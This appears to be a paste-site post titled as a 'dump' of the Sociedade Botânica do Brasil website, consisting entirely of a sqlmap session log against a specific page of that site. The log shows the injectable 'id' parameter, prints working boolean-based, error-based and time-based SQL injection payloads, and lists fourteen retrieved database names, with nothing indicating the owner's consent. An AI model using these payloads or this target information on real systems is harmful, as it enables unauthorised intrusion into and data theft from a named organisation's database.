Frenetic

[Frenetic] Dump Sociedade Botânica do Brasil

Dec 14th, 2017
$ python sqlmap.py -u http://www.botanica.org.br/go_news.php?id=62 --dbs --random-agent
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.12.12#dev}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:42:04

[22:42:05] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it) AppleWebKit/522.13.1 (KHTML, like Gecko) Version/3.0.2 Safari/522.13.1' from file '/home/Frenetic/SQLMAP/txt/user-agents.txt'
[22:42:09] [INFO] testing connection to the target URL
[22:42:10] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[22:42:10] [INFO] testing if the target URL content is stable
[22:42:11] [INFO] target URL content is stable
[22:42:11] [INFO] testing if GET parameter 'id' is dynamic
[22:42:11] [INFO] confirming that GET parameter 'id' is dynamic
[22:42:11] [INFO] GET parameter 'id' is dynamic
[22:42:13] [INFO] heuristics detected web page charset 'ascii'
[22:42:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:42:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[22:42:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[22:42:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:42:17] [WARNING] reflective value(s) found and filtering out
[22:42:18] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Em")
[22:42:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:42:19] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[22:42:19] [INFO] testing 'MySQL inline queries'
[22:42:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[22:42:19] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[22:42:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[22:42:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:42:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=62 AND 5236=5236

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=62 AND (SELECT 3948 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(3948=3948,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=62 AND SLEEP(5)
---
[22:43:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0
[22:43:04] [INFO] fetching database names
[22:43:06] [INFO] used SQL query returns 14 entries
[22:43:06] [INFO] retrieved: information_schema
[22:43:06] [INFO] retrieved: botanica_acta
[22:43:07] [INFO] retrieved: botanica_acta02
[22:43:07] [INFO] retrieved: botanica_acta03
[22:43:08] [INFO] retrieved: botanica_acta04
[22:43:08] [INFO] retrieved: botanica_acta05
[22:43:08] [INFO] retrieved: botanica_acta1
[22:43:08] [INFO] retrieved: botanica_eventos
[22:43:09] [INFO] retrieved: botanica_herbarios
[22:43:09] [INFO] retrieved: botanica_herbarios_bkp
[22:43:09] [INFO] retrieved: botanica_herbarios_old
[22:43:09] [INFO] retrieved: botanica_re-centro-oeste
[22:43:09] [INFO] retrieved: botanica_sbb
[22:43:10] [INFO] retrieved: botanica_sbb_bkp
available databases [14]:
[*] botanica_acta
[*] botanica_acta02
[*] botanica_acta03
[*] botanica_acta04
[*] botanica_acta05
[*] botanica_acta1
[*] botanica_eventos
[*] botanica_herbarios
[*] botanica_herbarios_bkp
[*] botanica_herbarios_old
[*] botanica_re-centro-oeste
[*] botanica_sbb
[*] botanica_sbb_bkp
[*] information_schema

[22:43:10] [INFO] fetched data logged to text files under '/home/Frenetic/.sqlmap/output/www.botanica.org.br'

[*] shutting down at 22:43:10